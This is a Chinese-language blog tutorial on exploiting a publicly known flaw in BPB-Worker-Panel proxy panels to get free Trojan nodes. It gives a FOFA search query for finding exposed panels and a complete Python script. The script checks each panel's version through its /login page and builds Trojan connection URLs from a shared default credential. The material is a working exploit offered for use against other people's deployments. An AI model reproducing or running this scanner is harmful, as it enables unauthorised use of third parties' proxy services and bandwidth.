利用 BPB 面板漏洞获取免费 Trojan 节点
利用高于 2.5.3 版本的 BPB-Worker-Panel 面板漏洞,获取大量免费的 Trojan 节点。
1. 前言
本文主要介绍如何利用 BPB-Worker-Panel 面板的一个漏洞来获取免费的代理节点。这个漏洞其实早就被公开,但开发者似乎一直没有修复的打算。所以,大家一起来“欢乐”一下吧!请注意,在官方修复漏洞之前,不建议继续安装 BPB-Worker-Panel 面板!
本文参考了批量获取免费的VPN节点,用不完真用不完….. BPB-Worker-Panel 面板BUG利用!!-零度博客。
2. 教程
2.1. 准备工作
首先,安装 Python 的 requests 依赖库:
2.2. 获取 BPB-Worker-Panel 面板网址
- 在浏览器中打开
https://i.nosec.org/login 并登录账号。
- 打开
https://fofa.info/result?qbase64=aWNvbl9oYXNoPSItMTM1NDAyNzMxOSIgJiYgYXNuPSIxMzMzNSIgJiYgcG9ydD0iNDQzIg%3D%3D,将搜索结果下载为 CSV 文件。
2.3. 验证 BPB-Worker-Panel 面板版本
将下载的 CSV 文件重命名为 input.txt(或者直接在代码中修改文件名)。在同一目录下,新建一个 .py 文件,然后复制粘贴以下代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
| from packaging import version
import requests
input_file = "input.txt"
output_file = "trojan_urls.txt"
domain = "www.visa.com.sg"
def append_login_to_urls(input_file, output_file):
"""将地址加上 /login 并保存到新文件"""
print(f"正在处理 {input_file},将地址加上 /login 并保存到 {output_file}...")
with open(input_file, "r", encoding="utf-8") as infile, open(
output_file, "w", encoding="utf-8"
) as outfile:
for line in infile:
if line.lower().startswith("http"):
url = line.split(",")[0].strip() + "/login"
outfile.write(url + "\n")
print(f"已完成地址追加,结果保存到 {output_file}")
def extract_version(html):
"""从 HTML 内容中提取 BPB Panel 的版本号"""
if "BPB Panel" in html:
start_index = html.find("BPB Panel")
version_start = html.find("2", start_index)
version_end = version_start
while version_end < len(html) and (
html[version_end].isdigit() or html[version_end] == "."
):
version_end += 1
return html[version_start:version_end]
return None
def check_bpb_version(input_file, output_file):
"""访问地址并检查 BPB Panel 的版本号"""
print(f"正在验证 {input_file} 中的地址...")
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
}
min_version = version.parse("2.5.3")
with open(input_file, "r", encoding="utf-8") as infile, open(
output_file, "w", encoding="utf-8"
) as outfile:
for line in infile:
url = line.strip()
try:
response = requests.get(url, headers=headers, timeout=10)
if response.status_code == 200 and "BPB Panel" in response.text:
raw_version = extract_version(response.text)
if raw_version:
parsed_version = version.parse(raw_version)
if parsed_version > min_version:
print(f"[匹配] {url} (版本号: {parsed_version})")
outfile.write(url + "\n")
except Exception as e:
print(f"[错误] 无法访问 {url},错误:{e}")
print(f"验证完成,符合条件的地址保存到 {output_file}")
def composite_trojan(input_file, output_file):
"""合成 Trojan 地址"""
with open(input_file, "r", encoding="utf-8") as infile, open(
output_file, "w", encoding="utf-8"
) as outfile:
for line in infile:
url = line.strip()
url = url[8:-6]
trojan_url = f"trojan://bpb-trojan@{domain}:443?security=tls&sni={url}&fp=chrome&allowlnsecure=1&type=ws&host={url}&path=%2Ftr%3Fed%3D2560#{url}"
outfile.write(trojan_url + "\n")
if __name__ == "__main__":
append_login_to_urls(input_file, "bpb_urls.txt")
check_bpb_version("bpb_urls.txt", "bpb_urls_ok.txt")
composite_trojan("bpb_urls_ok.txt", output_file)
|
2.4. 导入 Trojan 节点
运行上述 Python 脚本后,在同目录下生成的 trojan_urls.txt 文件中包含了可用的 Trojan 节点信息。将这些节点信息导入你的 Trojan 客户端即可。